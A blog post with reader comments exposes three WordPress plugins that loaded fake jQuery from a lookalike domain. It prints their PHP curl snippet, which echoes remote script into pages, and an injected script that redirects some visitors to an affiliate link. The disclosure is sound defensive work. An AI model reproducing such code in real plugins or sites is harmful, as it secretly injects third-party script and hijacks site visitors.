Beware Fake jQuery Inclusions by WordPress Plugins in the Repo

We received an email today from a WordPress user who wanted to alert us to a jQuery hack.  At first, I’ve got to admit, I was a little bit sceptical but I thought it was worth looking in to. I was surprised by what I found.

We all love jQuery – sometimes I like to daydream about marrying it in some sort of exotic ceremony in Barbados. In fact, it’s so awesome that it’s become a little bit ubiquitous. There are so many plugins using jQuery that we’re totally used to finding it in them.

Normally a WordPress plugin will get jQuery from just a few places:

  • Google CDN
  • WordPress itself
  • Microsoft CDN
  • jQuery CDN

But what if you had a plugin that was getting it’s jQuery from http://j-query.org?

That seems pretty legit, right? I mean it’s got j-query in the damned domain! And when you visit it, you end up at http://jquery.org – the official site of jQuery.

Oh… wait…. http://j-query.org and http://jquery.org – they’re not the same, are they?

No, they’re not. And http://j-query.org isn’t even registered by the people at jquery. It’s registered with domains by proxy, and forwards to servers at Media Temple.

So it’s got to be suspicious when you find three WordPress plugins that all contain this piece of code:

if(function_exists('curl_init'))
	{
		$url = "http://www.j-query.org/jquery-1.6.3.min.js";
		$ch = curl_init();
		$timeout = 5;
		curl_setopt($ch,CURLOPT_URL,$url);
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
		$data = curl_exec($ch);
		curl_close($ch);
		echo "$data";
	}
}

There are three plugins containing this code. They are:

All three of these plugins are from the same person – iintensemedia who runs the site Iintense Media (also registered by domain by proxy, nameservers at Media Temple – doesn’t mean anything, am just sayin’, right?).

Let’s take a look at one of these in trac:

Quick coupon in the WordPress repo

Now, I expect you’ll go running off to that j-query link and then you’ll come running back and be all “Siobhan!” (and btw, it’s pronounced Shavonne – get it right before you shout at me plz. anyway…..) “Siobhan! It’s just a blank page! WTF?”

Yes, I am aware of that – it looks like the offending js has been removed. But a little bit of investigation tells us what it does.

1. The First Clue

Check out this forum thread in which the excited alexpike mentions to the dev that the plugin inserts the following into his header:

<script type = "text/javascript">
var now = new Date().getTime();
if (now%8 == 0) {
window.location = "http://trk.cpainfinity.com/SHD1";
}
</script>

How does the dev respond?

Featured Plugin - WordPress Google Maps Plugin

Simply insert google maps into posts, sidebars and pages - show directions, streetview, provide image overlays and do it all from a simple button and comprehensive widget.
Find out more

2. The Plot Thickens

That’s not the only place where someone posted about noticing strange JS being added to their website. A member of the Black Hat World Forums was concerned when his website was hacked.

The member said that this file: http://www.j-query.org/jquery-1.6.4.min.js was propogating this site with CPA Infinity Affiliate links. CPA Infinity? Where have we seen that before? In the first clue, dingbats. These are affiliate backlinks to CPA Infinity.

Which means that someone has been making money with some fake http://j-query.org site which is fooling people into thinking that they’re getting some delicious jQuery but they’re actually sending about 1 in every 8 of your visitors to the CPA Infinity link.

Anyway, CPA Infinity didn’t seem to be too impressed about it as their founder has banned the user. Perhaps that’s why the js file is no longer working.

Update: A commenter has noted this link.

the link leads to a black hat seo page

Who’s behind it?

Obviously I couldn’t say. Iintensemedia seems like a good community-minded guy who is always looking for orphaned plugins to adopt. And not at all interested in Black Hat SEO:

[blackbirdpie url=”http://twitter.com/#!/iintense/status/124490755342483456″]

What’s the Moral of the Story?

Well kids, every good story has got a good moral, and this one does too.

The WordPress Plugin Directory is not infalliable. Things get in that can exploit your WordPress website. We’ve written about this before. Unfortunately it’s the case that while the Theme Directory has got strict review guidelines and a committed review team, the Plugin Directory has nothing comparable. We all trust the plugin directory implicitly (we recommended one of the above plugins ourselves) but maybe we aren’t right to do so. Our assumption that the plugin directory is the safest place to get a plugin from maybe isn’t correct. The plugin directory most definitely has its weaknesses, and its weaknesses are the weaknesses of everyone who runs their website on WordPress.

Install some security plugins to keep watch on your site, and be careful where you get your scripts from – you never know what you might catch! ;)

Were you affected by any of these plugins? We’d love to hear your story in the comments.

Comments (38)

  1. Great article! The WordPress team is usually good at checking/testing plugins (and themes) before they are accepted into the repository…..I’m surprised they are missing malicious plugins like this.

      • @Siobhan (Shavonne) Thanks for getting the word out and helping the legions of WordPress supporters like me be vigilant against these hacks. Just last week a well meaning member of the OC WordPress group did a shout out about a malware infested site of mine which made we wince – but in the end it brought everyone’s awareness up which can only be a good thing for the community. I think the Penn State saga reminded us of that recently.

    • I was just going to ask if anyone had reported this to WordPress directly, and was happy to see Otto’s post. (I tried “Liking” your post, but that option isn’t available.)

      After attending WCSF, we learned that blogging about a WordPress issue only broadcasts the vulnerability. The better option is letting WordPress know directly, and quietly. Not because they want to hide the issue, but again, they want to resolve it before hackers take advantage of it.

      Thanks again Otto!

      • Yes, when we have become aware of vulnerabilities in plugins in the past we have alerted the repo – and as there was a post on the forum I assumed that they had been alerted. Especially since the JS had been removed by the time we got to look at it. Also, this is not a vulnerability that any other hacker could take advantage of as it’s one guy who has set up a fake j-query site. It’s not a vulnerability with WordPress itself.

        In any case, the issue is one that WordPress users should be aware of. People should know that a fake jQuery link can leave their website vulnerable – I think it’s important to educate people about that. There was no reason not to post about it.

        • Thanks, I tried editing my post to correct “hacker” and a few other items. I also tried deleting it to repost, but that option wasn’t available either.

          Good to know you’ve notified WordPress in the past. :) And although this may not have been a vulnerability. I still liken it to showing those, with bad intent, possible options. But then again, this happens all over the internet, on TV, etc.

          Thanks for the heads-up.

    • Exactly, well pointed out. There’s really not a great deal of need for using external jQuery instead of just the one packaged with WordPress itself, especially when it often gets done incorrectly too.

  2. Lately, I’ve been giving more thought to this sort of vulnerability as a I deal with more clients sites just full of activated plugins (some in use, some not even). Nice to have a clear case study for those discussions about paring back and managing what’s in use.

  3. I actually had the WP Facebook Events plugin installed on a new site I was tinkering with for the day job.

    After reading this I immediately deleted absolutely everything (luckily I had not done too much to the site)

    However it is a little bit frightening how these things can happen, but (there is always a but) I don’t think its a time to panic though in fairness. With the amount of plugins being released and the popularity of WordPress in general you are always going to get opportunists looking to exploit less savvy users. So a couple slipped through the net.

    Just employ best practice and do your research before you even install it, is their a forum for the plugin? Is it regularly updated? Is there an active community of others having issues? If so avoid it.

    I now download all plugins and install them on a test site and go through them just to make 100% sure, but then I can be quite anal!

    Cheers

    Ben

    • @Saru, the method you’d use depends on the type of access you have to the server. One method is to search for the domain name in a BASH shell:
      find . -type f |xargs -i grep ‘j-query.org’ {} -l

      If it’s a Windows machine, the best way is to use Agent Ransack (awesome search tool for Windows).

      If you only have FTP access, then the you’ve got a couple options. The more time consuming (but more accurate) method is to download the entire site to your desktop and search for the domain name or ‘bad code’ that way. Another method (though more limited by server constraints) is via a WordPress plugin such as the TimThumb vulnerability scanner (minor changes to it’s source would allow free-form all file searches).

  4. Shavonne!

    Now I can *finally* quit hurting my neck trying to pronounce your name. I wasn’t even close. In fact, I’m pretty sure I never said it the same way twice when I spoke of you (ALWAYS in glowing terms BTW). =)

    Thanks for this great article. I didn’t use any of these, but I came close to using the event plugin. How spooky that something like this would get through.

    ~ Corey

  5. Hello, I am receiving the following message on my site: Web Server at j-query.orr was not found! I am reading this now my website has been a vicitm of this people. How can I identify what file contains this code? I am running a wordpress site, I already deactivated all my plugins to see of one of those had it but the message is still appearing on the home page. ANy help would be appreciated!

      • The original was in the WP repo area but I think, and I am not sure as I manage so many sites, but we upgraded the plugin recently and I think that is when it became injected. I tested a number of my other sites and it does not seem to be a problem with those.

  6. Damn, great set of catches. And quite worrying really, all in all.

    But also a bit of a problem from an entirely different angle, as we used that Facebook events plugin :( Question now is that of finding a replacement – and checking details just in case.

    I don’t suppose anyone has any suggestions for an alternative?

Participate